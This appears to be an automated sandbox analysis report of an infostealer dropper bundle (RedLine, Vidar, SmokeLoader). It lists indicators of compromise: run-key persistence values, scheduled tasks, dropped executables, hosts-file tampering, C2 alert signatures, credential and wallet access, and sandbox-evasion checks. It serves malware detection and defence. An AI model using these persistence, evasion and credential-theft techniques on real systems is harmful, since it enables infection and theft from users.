redline | baa381f572d293636b6e48cacd2cd6a6f4f9e5f71c583873260f6ac01f0f5e15

Change Default File Association

T1042

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx\ = "{CB3D0F55-BC2C-4C1A-85ED-23ED75B5106B}"	OneDriveSetup.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\lnkfile\shellex\ContextMenuHandlers\ FileSyncEx	OneDriveSetup.exe

Process spawned unexpected child process 3 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

description	pid	pid_target	Process	procid_target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	900	4644	rundll32.exe	14
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	2192	4644	rundll32.exe	14
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process	7300	4644	rundll32.exe	14

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine Payload 1 IoCs

resource	yara_rule
behavioral7/memory/4568-348-0x00000000052A0000-0x00000000052D8000-memory.dmp	family_redline

Registers COM server for autorun 1 TTPs
persistence

Registry Run Keys / Startup Folder
T1060
SmokeLoader
Modular backdoor trojan in use since 2014.
trojan backdoor smokeloader

Suspicious use of NtCreateProcessExOtherParentProcess 2 IoCs

description	pid	Process	procid_target
PID 5844 created 3816	5844	WerFault.exe	106
PID 6148 created 1204	6148	WerFault.exe	92

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 5148 created 5720	5148	svchost.exe	243

Vidar
Vidar is an infostealer based on Arkei stealer.
stealer vidar
suricata: ET MALWARE Amadey CnC Check-In
suricata: ET MALWARE Amadey CnC Check-In
suricata
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
suricata
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
suricata
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata: ET MALWARE Observed Win32/Ymacco.AA36 User-Agent
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity
suricata
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata: ET MALWARE Win32/Adware.Agent.NSU CnC Activity M2
suricata
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata: ET MALWARE Win32/Tnega Activity (GET)
suricata
Checks for common network interception software 1 TTPs
Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.
evasion

Software Discovery
T1518

Vidar Stealer 2 IoCs

stealer

resource	yara_rule
behavioral7/memory/1204-301-0x0000000003F00000-0x0000000003FD3000-memory.dmp	family_vidar
behavioral7/memory/1204-314-0x0000000000400000-0x00000000021BE000-memory.dmp	family_vidar

ASPack v2.12-2.42 6 IoCs

Detects executables packed with ASPack v2.12-2.42

aspackv2

resource	yara_rule
behavioral7/files/0x000500000001ab4e-124.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4f-126.dat	aspack_v212_v242
behavioral7/files/0x000500000001ab4e-125.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab51-128.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab51-129.dat	aspack_v212_v242
behavioral7/files/0x000400000001ab4f-123.dat	aspack_v212_v242

Blocklisted process makes network request 49 IoCs

flow	pid	Process
137	6624	powershell.exe
181	7432	MsiExec.exe
182	7432	MsiExec.exe
183	7432	MsiExec.exe
188	7432	MsiExec.exe
189	7432	MsiExec.exe
191	7432	MsiExec.exe
192	7432	MsiExec.exe
193	7432	MsiExec.exe
195	7432	MsiExec.exe
196	7432	MsiExec.exe
199	7432	MsiExec.exe
202	7432	MsiExec.exe
203	7432	MsiExec.exe
204	7432	MsiExec.exe
205	7432	MsiExec.exe
206	7432	MsiExec.exe
207	7432	MsiExec.exe
208	7432	MsiExec.exe
209	7432	MsiExec.exe
210	7432	MsiExec.exe
211	7432	MsiExec.exe
212	7432	MsiExec.exe
217	7432	MsiExec.exe
218	7432	MsiExec.exe
219	7432	MsiExec.exe
221	7432	MsiExec.exe
222	7432	MsiExec.exe
223	7432	MsiExec.exe
224	7432	MsiExec.exe
225	7432	MsiExec.exe
226	7432	MsiExec.exe
227	7432	MsiExec.exe
228	7432	MsiExec.exe
229	7432	MsiExec.exe
230	7432	MsiExec.exe
231	7432	MsiExec.exe
232	7432	MsiExec.exe
233	7432	MsiExec.exe
234	7432	MsiExec.exe
235	7432	MsiExec.exe
236	7432	MsiExec.exe
237	7432	MsiExec.exe
239	7432	MsiExec.exe
240	7432	MsiExec.exe
241	7432	MsiExec.exe
242	7432	MsiExec.exe
243	7432	MsiExec.exe
244	7432	MsiExec.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	zab2our.exe

Executes dropped EXE 64 IoCs

pid	Process
4716	setup_installer.exe
4776	setup_install.exe
1088	Fri156ec98815f89c.exe
1204	Fri1544861ac3fe6a.exe
1680	Fri155442fc38b.exe
1716	Fri1553f0ee90.exe
1832	Fri15af75ee9b.exe
2192	Fri157e25afd971.exe
2932	Fri157e25afd971.tmp
1288	LzmwAqmV.exe
4780	Chrome 5.exe
4320	zab2our.exe
2176	PublicDwlBrowser1100.exe
4416	2.exe
4756	8395340.exe
3816	setup.exe
1096	Pubdate.exe
1828	setup_2.exe
2720	3002.exe
1320	rnyuf.exe
5100	6170962.exe
3352	jhuuee.exe
4740	WerFault.exe
4568	4644226.exe
3900	setup_2.exe
5176	3920795.exe
5188	setup_2.tmp
5212	7157114.exe
5336	anyname.exe
5400	WinHoster.exe
5476	6686198.exe
5596	8972360.exe
5696	8667013.exe
5912	2926759.exe
4588	1565591.exe
3156	postback.exe
6032	ultramediaburner.exe
2620	ultramediaburner.tmp
3880	Rimiwyjoci.exe
5144	Rokapohiri.exe
6056	UltraMediaBurner.exe
6204	services64.exe
6796	GcleanerEU.exe
728	installer.exe
5336	anyname.exe
4224	gcleaner.exe
6896	anyname.exe
6812	wKX1KQHYx.exe
1320	rnyuf.exe
7544	Pgnm5Zfs0.exe
7628	sihost64.exe
6752	rnyuf.exe
7320	rnyuf.exe
6860	FileSyncConfig.exe
7932	rnyuf.exe
7320	rnyuf.exe
5472	thrbucb
6756	rnyuf.exe
1776	rnyuf.exe
6980	rnyuf.exe
3960	rnyuf.exe
8140	rnyuf.exe
5600	rnyuf.exe
7496	rnyuf.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Control Panel\International\Geo\Nation	Rimiwyjoci.exe

Loads dropped DLL 46 IoCs

pid	Process
4776	setup_install.exe
4776	setup_install.exe
4776	setup_install.exe
4776	setup_install.exe
4776	setup_install.exe
4776	setup_install.exe
4776	setup_install.exe
2932	Fri157e25afd971.tmp
4820	rundll32.exe
1320	rnyuf.exe
5188	setup_2.tmp
5488	rundll32.exe
728	installer.exe
728	installer.exe
728	installer.exe
6888	MsiExec.exe
6888	MsiExec.exe
6840	rundll32.exe
1204	Fri1544861ac3fe6a.exe
1204	Fri1544861ac3fe6a.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
7432	MsiExec.exe
728	installer.exe
7432	MsiExec.exe
7432	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
8108	MsiExec.exe
7432	MsiExec.exe
6860	FileSyncConfig.exe
6860	FileSyncConfig.exe
6860	FileSyncConfig.exe
6860	FileSyncConfig.exe
6860	FileSyncConfig.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses 2FA software files, possible credential harvesting 2 TTPs
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 5 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\Run\WinHost = "C:\\Users\\Admin\\AppData\\Roaming\\WinHost\\WinHoster.exe"	6170962.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\system recover = "\"C:\\Program Files (x86)\\Reference Assemblies\\Luqafaejoly.exe\""	zab2our.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\Update\\OneDriveSetup.exe\""	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Delete Cached Standalone Update Binary = "C:\\Windows\\system32\\cmd.exe /q /c del /q \"C:\\Users\\Admin\\AppData\\Local\\Microsoft\\OneDrive\\StandaloneUpdater\\OneDriveSetup.exe\""	OneDriveSetup.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 6 IoCs

evasion trojan

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	UltraMediaBurner.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Fri157e25afd971.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	setup_2.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ultramediaburner.tmp
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Rokapohiri.exe

Enumerates connected drives 3 TTPs 48 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
File opened (read-only)	\??\Q:	msiexec.exe
File opened (read-only)	\??\A:	installer.exe
File opened (read-only)	\??\H:	installer.exe
File opened (read-only)	\??\J:	installer.exe
File opened (read-only)	\??\B:	msiexec.exe
File opened (read-only)	\??\I:	msiexec.exe
File opened (read-only)	\??\K:	msiexec.exe
File opened (read-only)	\??\L:	msiexec.exe
File opened (read-only)	\??\U:	msiexec.exe
File opened (read-only)	\??\W:	msiexec.exe
File opened (read-only)	\??\B:	installer.exe
File opened (read-only)	\??\N:	installer.exe
File opened (read-only)	\??\V:	installer.exe
File opened (read-only)	\??\Z:	installer.exe
File opened (read-only)	\??\F:	msiexec.exe
File opened (read-only)	\??\H:	msiexec.exe
File opened (read-only)	\??\I:	installer.exe
File opened (read-only)	\??\S:	installer.exe
File opened (read-only)	\??\U:	installer.exe
File opened (read-only)	\??\P:	msiexec.exe
File opened (read-only)	\??\V:	msiexec.exe
File opened (read-only)	\??\T:	msiexec.exe
File opened (read-only)	\??\F:	installer.exe
File opened (read-only)	\??\M:	installer.exe
File opened (read-only)	\??\T:	installer.exe
File opened (read-only)	\??\Y:	installer.exe
File opened (read-only)	\??\G:	msiexec.exe
File opened (read-only)	\??\J:	msiexec.exe
File opened (read-only)	\??\S:	msiexec.exe
File opened (read-only)	\??\Y:	msiexec.exe
File opened (read-only)	\??\R:	installer.exe
File opened (read-only)	\??\N:	msiexec.exe
File opened (read-only)	\??\R:	msiexec.exe
File opened (read-only)	\??\Z:	msiexec.exe
File opened (read-only)	\??\E:	installer.exe
File opened (read-only)	\??\G:	installer.exe
File opened (read-only)	\??\K:	installer.exe
File opened (read-only)	\??\X:	installer.exe
File opened (read-only)	\??\E:	msiexec.exe
File opened (read-only)	\??\O:	msiexec.exe
File opened (read-only)	\??\Q:	installer.exe
File opened (read-only)	\??\A:	msiexec.exe
File opened (read-only)	\??\L:	installer.exe
File opened (read-only)	\??\O:	installer.exe
File opened (read-only)	\??\P:	installer.exe
File opened (read-only)	\??\W:	installer.exe
File opened (read-only)	\??\M:	msiexec.exe
File opened (read-only)	\??\X:	msiexec.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
42	ip-api.com
100	ip-api.com

Drops file in System32 directory 15 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\rnyuf.exe	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #2	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #5	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\OneDrive Standalone Update Task-S-1-5-21-2559286294-2439613352-4032193287-1000	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #1	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #6	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Firefox Default Browser Agent 910404EF02C1C5EF	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\User_Feed_Synchronization-{4F246605-F333-40E5-8FE6-2ED3621ADF90}	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\services64	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedUpdater	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #3	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\AdvancedWindowsManager #4	svchost.exe

Suspicious use of SetThreadContext 3 IoCs

description	pid	Process	procid_target
PID 1912 set thread context of 5036	1912	svchost.exe	116
PID 3156 set thread context of 5592	3156	postback.exe	153
PID 6204 set thread context of 6564	6204	services64.exe	233

Drops file in Program Files directory 18 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe	ultramediaburner.tmp
File opened for modification	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\AdvancedWindowsManager.exe	msiexec.exe
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Uninstall.lnk	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Privacy.url	msiexec.exe
File created	C:\Program Files\VideoLAN\BBBXTCBXGR\ultramediaburner.exe	zab2our.exe
File created	C:\Program Files (x86)\Reference Assemblies\Luqafaejoly.exe	zab2our.exe
File created	C:\Program Files (x86)\UltraMediaBurner\is-CO68D.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\FarLabUninstaller\is-UF154.tmp	setup_2.tmp
File created	C:\Program Files (x86)\Reference Assemblies\Luqafaejoly.exe.config	zab2our.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.ini	msiexec.exe
File created	C:\Program Files\VideoLAN\BBBXTCBXGR\ultramediaburner.exe.config	zab2our.exe
File opened for modification	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\unins000.dat	ultramediaburner.tmp
File created	C:\Program Files (x86)\UltraMediaBurner\is-02F1E.tmp	ultramediaburner.tmp
File created	C:\Program Files (x86)\AW Manager\Windows Manager\Windows Updater.exe	msiexec.exe
File opened for modification	C:\Program Files (x86)\AW Manager\Windows Manager\EULA.url	msiexec.exe
File created	C:\Program Files (x86)\FarLabUninstaller\unins000.dat	setup_2.tmp

Drops file in Windows directory 47 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Installer\MSI930A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\Installer\f756c99.msi	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI711A.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI94B3.tmp	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI7570.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI766C.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI76FA.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	Process not Found
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI77F5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9397.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI9444.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\f756c96.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI78E0.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI88B2.tmp	msiexec.exe
File created	C:\Windows\Installer\inprogressinstallinfo.ipi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI95AE.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI991B.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI85C2.tmp	msiexec.exe
File created	C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62}	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8B15.tmp	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\AppCompat\Programs\Amcache.hve.tmp	WerFault.exe
File created	C:\Windows\Installer\f756c96.msi	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI8B45.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI90D5.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI91FF.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\logo.exe	msiexec.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File opened for modification	C:\Windows\Installer\MSI761D.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI87B7.tmp	msiexec.exe
File opened for modification	C:\Windows\Installer\MSI89FB.tmp	msiexec.exe
File created	C:\Windows\Installer\{C845414C-903C-4218-9DE7-132AB97FDF62}\SystemFoldermsiexec.exe	msiexec.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\2274612954.pri	MicrosoftEdgeCP.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 27 IoCs

pid	pid_target	Process	procid_target
3472	4416	WerFault.exe	105
5708	1204	WerFault.exe	92
5320	1204	WerFault.exe	92
1660	3816	WerFault.exe	106
5604	1204	WerFault.exe	92
4740	3816	WerFault.exe	106
4552	1204	WerFault.exe	92
5732	3816	WerFault.exe	106
6048	1204	WerFault.exe	92
5924	3816	WerFault.exe	106
4732	3816	WerFault.exe	106
4508	1204	WerFault.exe	92
2996	1204	WerFault.exe	92
848	3816	WerFault.exe	106
5996	1204	WerFault.exe	92
5844	3816	WerFault.exe	106
5712	1204	WerFault.exe	92
6308	1204	WerFault.exe	92
5000	1204	WerFault.exe	92
6736	1204	WerFault.exe	92
7052	1204	WerFault.exe	92
7808	4756	WerFault.exe	129
4136	1204	WerFault.exe	92
7704	1204	WerFault.exe	92
7672	1204	WerFault.exe	92
7912	1204	WerFault.exe	92
6148	1204	WerFault.exe	92

Checks SCSI registry key(s) 3 TTPs 12 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

Peripheral Device Discovery

T1120

System Information Discovery

description	ioc	Process
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Fri15af75ee9b.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	thrbucb

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

System Information Discovery

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	svchost.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	svchost.exe

Creates scheduled task(s) 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

pid	Process
5020	schtasks.exe
2520	schtasks.exe
7356	schtasks.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
7484	taskkill.exe
7668	taskkill.exe
7944	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 6 IoCs

adware spyware

Modify Registry

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\OneDrive.exe = "11000"	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION	OneDriveSetup.exe

Modifies data under HKEY_USERS 19 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit\Version = "7"	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	svchost.exe
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\ActiveMovie\devenum 64-bit	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:"	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\17	msiexec.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	svchost.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	svchost.exe
Key deleted	\REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\16\52C64B7E	msiexec.exe
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\16	msiexec.exe

Modifies registry class 64 IoCs

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{THWC794Y-FI2R-S1WY-Z6CW-JHPFT080JY70}	svchost.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{0d4e4444-cb20-4c2b-b8b2-94e5656ecae8}	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{10C9242E-D604-49B5-99E4-BF87945EF86C}\TypeLib	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Software\Microsoft\SystemCertificates\Root\CRLs	MicrosoftEdge.exe
Key deleted	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_CLASSES\INTERFACE\{C2FE84F5-E036-4A07-950C-9BFD3EAB983A}\PROXYSTUBCLSID32	OneDriveSetup.exe
Key created	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{9D613F8A-B30E-4938-8490-CB5677701EBF}\TypeLib	OneDriveSetup.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-2559286294-2439613352-4032193287-1000_Classes\Interface\{3A4E62AE-45D9-41D5-85F5-A45B77AB44E5}\TypeLib\ = "{BAE13F6C-0E2A-4DEB-AA46-B8F55319347C}"	OneDriveSetup.exe
